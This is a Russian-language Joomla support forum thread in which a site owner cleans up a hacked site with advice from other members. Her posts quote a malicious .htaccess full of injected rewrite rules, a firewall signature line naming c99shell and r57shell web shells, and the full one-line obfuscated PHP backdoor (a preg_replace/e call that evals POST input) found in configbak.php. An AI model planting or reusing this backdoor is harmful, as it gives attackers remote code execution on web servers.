Форум русской поддержки Joomla!® CMS
11.12.2016, 17:51:58 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

Сайт превышает нагрузку! 3400 VS 300. Указанную папку найти не могу

 (Прочитано 644 раз)
0 Пользователей и 1 Гость смотрят эту тему.
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« : 18.05.2016, 02:16:10 »

Всем привет! Уже который день подряд видимо кто-то ломит мой сайт.
Нагрузки превышают уже все возможные варианты! 3400 против 300 возможных.
Хостер шлет письма с указанием процесса [/r/article/1143527453385345901/c22cc6d97fe94dba17032c0c3e38]
Но ни папку, ни файл ничего не могу найти. Кто-нибудь сталкивался с этой проблемой?
Проверяла айболитом - нашли вредоносные скрипты в com_rsfirewall/sql/sqlazure/signatures.data.sql
  • 1…ll ekin0x variant'),('kacak','filename','PHP Shell - c99shell kacak variant'),(' liz0zim','filename','PHP Shell - c99shell liz0zim variant'),('r57shell','regex'
Удалила... Так после этого нагрузка к вечеру показала 3400 против 300.
За день до моих поисков и "лечения" 740 против 300.

Помогите! Что делать?!

В .htaccess сейчас:
Код:
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)%[0-9]+([0-9]+).*[0-9]+_.*%[0-9]+%[0-9]+P([0-9]+)[0-9]+.*H(.*).*ZXZ.*([0-9]+).*X[0-9]+([^\d\/]+)PU[0-9]+R.*MV[0-9]+.*O.*[0-9]+%[0-9]+([^\d\/]+)%[0-9]+%[0-9]+%[0-9]+%[0-9]+([^\d\/]+).*%[0-9]+%[0-9]+%[0-9]+([0-9]+)%[0-9]+([0-9]+)-%[0-9]+%[0-9]+([^\d\/]+)$ ?$25$24=$6&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)..*$ ?$1$3=$2&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)\/[0-9]+\/[0-9]+\/[0-9]+\/[0-9]+_.*_.*\/[0-9]+-[0-9]+-.*-G([^\d\/]+)\/[0-9]+_.*_.*_.*_[0-9]+..*$ ?$5$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+_.*[0-9]+.*[0-9]+.*[0-9]+.*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+.*-.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+).*[0-9]+.*..*$ ?$2$1=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)\/([0-9]+)\/([0-9]+)$ ?$1$2=$3&%{QUERY_STRING}[L]
RewriteRule ^([^\d\/]+)\/E.*X.*\/([0-9]+)\/S.*N.*E.*\/([0-9]+)$ ?$1$4=$8&%{QUERY_STRING}[L]
« Последнее редактирование: 18.05.2016, 02:27:58 от xxx87 » Записан
Филипп Сорокин
Живу я здесь
******

Репутация: +121/-4
Offline Offline

Пол: Мужской
Сообщений: 1473


« Ответ #1 : 18.05.2016, 02:42:00 »

Цитировать
Что делать?!
Сажать на длительный карантин. Основная идея — запретить всё, что можно, изменить права, "отлучив" сервер от владения файлами, чтобы он не смог их изменять. Необходимо создать такую рабочую среду, в которой будут невозможны любые несанкционированные действия в файловой системе (обязательно не забудьте про open_basedir — иначе "конец" всей системе). Далее по логам ошибок вычислять шеллы.

Кстати, давно обновлялись? Какая версия Joomla?
Записан
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« Ответ #2 : 18.05.2016, 02:53:37 »

Сажать на длительный карантин. Основная идея — запретить всё, что можно, изменить права, "отлучив" сервер от владения файлами, чтобы он не смог их изменять. Необходимо создать такую рабочую среду, в которой будут невозможны любые несанкционированные действия в файловой системе (обязательно не забудьте про open_basedir — иначе "конец" всей системе). Далее по логам ошибок вычислять шеллы.

Кстати, давно обновлялись? Какая версия Joomla?
Joomla 3.5.0
Сейчас нашла в корне sitemap.xml весом 4.4 Мб вот с такими данными       
Код:
<url>
<loc>http://мойсайт.ru/red/5977/36</loc>
<lastmod>2016-05-11</lastmod>
<changefreq>daily</changefreq>
<priority>0.8</priority>
</url>
Те я так понимаю вот это и грузит процц?!
Логи ошибок - это в папке администр? Там в конце часто фигурируют - [11-May-2016 15:41:19 Europe/Moscow] PHP Warning:  Creating default object from empty value in /libraries/joomla/updater/adapters/extension.php on line 61
и
[05-Apr-2016 12:39:10 Europe/Moscow] PHP Strict Standards:  Declaration of JFormRulePwebGoogleAC::test() should be compatible with JFormRule::test(SimpleXMLElement $element, $value, $group = NULL, Joomla\Registry\Registry $input = NULL, JForm $form = NULL) in /modules/mod_pwebcontact/form/rules/pwebgoogleac.php on line 53

Записан
Филипп Сорокин
Живу я здесь
******

Репутация: +121/-4
Offline Offline

Пол: Мужской
Сообщений: 1473


« Ответ #3 : 18.05.2016, 02:56:19 »

Не заметил, версия актуальная.
Но лучше обновиться до 3.5.1 — заодно "перезальёте" все файлы CMS.
А Sitemap тут ни при чём.
Записан
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« Ответ #4 : 18.05.2016, 03:02:32 »

Не заметил, версия актуальная.
Но лучше обновиться до 3.5.1 — заодно "перезальёте" все файлы CMS.
А Sitemap тут ни при чём.
Извините, а open_basedir это же в .ini А я его сразу удалила. А на .htaccess  поставила 444 права - правильно все?! Просто совсем плохо разбираюсь во всем этом пока Sad((((((
а вот и чудо находка в index
Показать текстовый блок
« Последнее редактирование: 18.05.2016, 03:08:25 от xxx87 » Записан
Филипп Сорокин
Живу я здесь
******

Репутация: +121/-4
Offline Offline

Пол: Мужской
Сообщений: 1473


« Ответ #5 : 18.05.2016, 03:07:36 »

На виртуальном хостинге вы не имеете доступа к php.ini, описанные мной вещи в моём первом сообщении в рамках виртуального хостинга сделать не получится. Сайт нужно переносить на VDS (найдите самый дешёвый за 500 руб. в месяц). Всё дело в том, что серверу доступны файлы всегда, независимо от того, какие права установлены. Даже если вы поставите 000, то шелл всё равно сможет манипулировать файлами. Тут необходим совсем иной подход.
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #6 : 18.05.2016, 08:02:21 »

.htaccess заменить на стандартный с архива ДЖумла . Наверно уже и поисковики проиндексировали весь хлам с сайта.
Айболит должен был найти и файлы со скриптом, как в indrx.php. Включите параноидальный режим сканера айболит и проверьте. Или поиск в файлах по кускам кода, в редакторе Notepad++
Записан
Taatshi
Support Team
*****

Репутация: +430/-3
Offline Offline

Пол: Женский
Сообщений: 4718

Мама, я снова верстал во сне...


« Ответ #7 : 18.05.2016, 08:30:26 »

Я бы на Вашем месте заказала платную чистку. Судя по Вашему общению на форуме, не обижайтесь, но сами Вы не справитесь как мне кажется. Нужно неплохо знать код Joomla и структуру папок и файлов чтоб полностью вычистить сайт. Одного айболита может и не хватить.
Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #8 : 18.05.2016, 08:34:12 »

Однозначно изолировать сайт от других если есть и проверить его ai-bolit хотя бы.

Эта штука не виновата.
com_rsfirewall/sql/sqlazure/signatures.data.sql

Хотя возможно происки хостера  и конкурентов.
Записан
SDKiller
Dev Team
******

Репутация: +325/-5
Offline Offline

Пол: Мужской
Сообщений: 2749


...ergo sum


« Ответ #9 : 18.05.2016, 10:30:57 »

.htaccess заменить на стандартный с архива ДЖумла

+1

com_rsfirewall/sql/sqlazure/signatures.data.sql

Вы всего лишь нашли сигнатуры (образцы фрагментов кода) вредоносных скриптов в установочном sql-файле com_rsfirewall
Думаю вы бы получили аналогичный результат если бы "айболитом" проверили файлы самого айболита.

...Тут необходим совсем иной подход.

Что за бред в целом?

Цитировать
...обязательно не забудьте про open_basedir — иначе "конец" всей системе...
...Сайт нужно переносить на VDS...
...серверу доступны файлы всегда, независимо от того, какие права установлены...

Какой системе конец?

Если она сидит на шареде с единственным сайтом - то open_basedir - забота хостера.
У вменяемого хостера ничего не выйдет за пределы её аккаунта и без open_basedir. А скрипты будут исполняться от пользователя её аккаунта.

И зачем ей vds? Учиться админить?
Или по опыту работы с шаредом просто тупо взять предоставленные данные и развернуть сайт из-под рута?
Записан
Филипп Сорокин
Живу я здесь
******

Репутация: +121/-4
Offline Offline

Пол: Мужской
Сообщений: 1473


« Ответ #10 : 18.05.2016, 13:55:11 »

Цитировать
Что за бред в целом?
Куку! Бред в целом — это замена .htaccess на новый и смена прав на шареде, т.к. это ничего не изменит. Поэтому здесь нужен совсем иной подход, нежели смена прав. Здесь ещё нужно сменить владельца пула PHP, что невозможно сделать на шареде.

Цитировать
И зачем ей vds?
см. выше.

Цитировать
open_basedir - забота хостера.
Если автор вдруг захочет чему-то научиться (или же захочет научиться кто-нибудь другой, читающий эту тему), то я уже дал один готовый хороший совет, чем неплохо?
« Последнее редактирование: 18.05.2016, 14:01:09 от Филипп Сорокин » Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #11 : 18.05.2016, 20:55:23 »

Записан
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« Ответ #12 : 20.05.2016, 22:12:05 »

Чистила я чистила и тьфу тьфу вроде все вычистила. Судя по логам ломали через  плагин либо катпродакт для вирт или второй ( не помню как он называется - его аналог ), да и еще одно для коммуникации ( была старая версия ). Обновила все что можно и заменила  все файлы из свежей Joomla. js файлы залила из квикстарта шаблона как и большинство файлов. Обновила rsfirewall, произвела настройки ( но основательно проверю и проведу настройки чуть позже как только Касперыч закончит проверку тотальную моего ноута ). Закрыла доступ к админке паролем.
Теперича думаю на чем все же строить магаз на VirtueMart или на ДШ. Страшно уже что вирт так ломят.
Кстати есть файлы, которые по версии rsfirewall были модифицированны и он предлагает загрузить оригиналы. Что думаете? тк эти файлы я заливала все же с официального дистрибутива. Не пойму на что он ругается.
Сижу и не знаю верить ли своему счастью или это затишье перед бурей.
Кстати вчера после всех манипуляций - нагрузка пришла в норму Azn)))))))
Записан
ChaosHead
Профи
********

Репутация: +382/-10
Offline Offline

Пол: Мужской
Сообщений: 4398



« Ответ #13 : 20.05.2016, 22:15:10 »

Резервную копию сделайте, чтобы не пришлось потом чистить всё заново, если вычистили вдруг не всё
Записан
Филипп Сорокин
Живу я здесь
******

Репутация: +121/-4
Offline Offline

Пол: Мужской
Сообщений: 1473


« Ответ #14 : 20.05.2016, 22:22:31 »

Есть хорошая программа для Windows WinMerge — с помощью неё можно произвести сравнение файлов в указанных каталогах. Очень помогает при борьбе с вирусами. Сравнивать нужно с чистым дистрибутивом.
Записан
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« Ответ #15 : 20.05.2016, 23:30:33 »

ChaosHead и Филипп Сорокин спасибо за советы!
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #16 : 20.05.2016, 23:39:09 »

Я бы посоветовал на недельку поставить какой нить хорошенький снифер запросов, если что нить осталось, то там отследите, плюс также не плохо было бы, если что то отловити, взять ctime-неделя-месяц, и посмотреть изминения.... ну и конечно же профилактические меры безопасности по настройки сервера...
Записан
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« Ответ #17 : 21.05.2016, 00:52:19 »

Опять пошла нагрузка. Начала шерстить рут файлы и обнаружила вот эту прелесть.
 .clamavconnector.scan
Код:
public_html/сайт2/tmp/sfx.php=Win.Trojan.Hide-1
Только сейчас увидела возможность поиска по файлам по части кода в редакторе - занимаюсь. Тк  нагрузка идет от
 [/red/5974/13925] тоже самое что было в карте сайта
Сайт2 я уже благополучно снесла перед чисткой
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #18 : 21.05.2016, 01:33:45 »

Опять пошла нагрузка. Начала шерстить рут файлы и обнаружила вот эту прелесть.
 .clamavconnector.scan
Код:
public_html/сайт2/tmp/sfx.php=Win.Trojan.Hide-1
Только сейчас увидела возможность поиска по файлам по части кода в редакторе - занимаюсь. Тк  нагрузка идет от
 [/red/5974/13925] тоже самое что было в карте сайта
Сайт2 я уже благополучно снесла перед чисткой
Там случайно "good day" не было написано?
Записан
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« Ответ #19 : 21.05.2016, 01:42:02 »

Цитата: winstrool
Там случайно "good day" не было написано?
Вроде бы нет. У меня вообще файлы какие то странные присутствуют в руте. Я к хостеру - пишу проверьте системные ли они - они говорят - если не пользуетесь - удаляйте.
.clamavconnector.scan это же вред файл, я правильно понимаю?!
Вот эти файлы меня очень смущают:
configbak.php
Код:
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['kt7uvf']) && ($www= $_POST['kt7uvf']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
.pearrc
И все это началось после того как меня ломанули турки - Hacked by Kabss
« Последнее редактирование: 21.05.2016, 01:49:01 от xxx87 » Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #20 : 21.05.2016, 01:47:48 »

файлом может быть хоть abracadabra.her.ego.znaet
Записан
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« Ответ #21 : 21.05.2016, 01:50:57 »

файлом может быть хоть abracadabra.her.ego.znaet
Как Вы считаете я все эти файлы могу удалить? Тк я все переживаю что системное что нить удалю
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #22 : 21.05.2016, 02:00:44 »

сделайте бекапы и экспериментируйте, что не так, востановите с бекапов....
Записан
xxx87
Осваиваюсь на форуме
***

Репутация: +4/-0
Offline Offline

Пол: Женский
Сообщений: 134


прошу любить и жаловать


« Ответ #23 : 21.05.2016, 03:40:18 »

Зараза еще сидела в root папке tmp
Вычистила все теперича Azn
Записан
Филипп Сорокин
Живу я здесь
******

Репутация: +121/-4
Offline Offline

Пол: Мужской
Сообщений: 1473


« Ответ #24 : 21.05.2016, 03:43:53 »

Проверьте также каталоги cache, images, media, logs
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet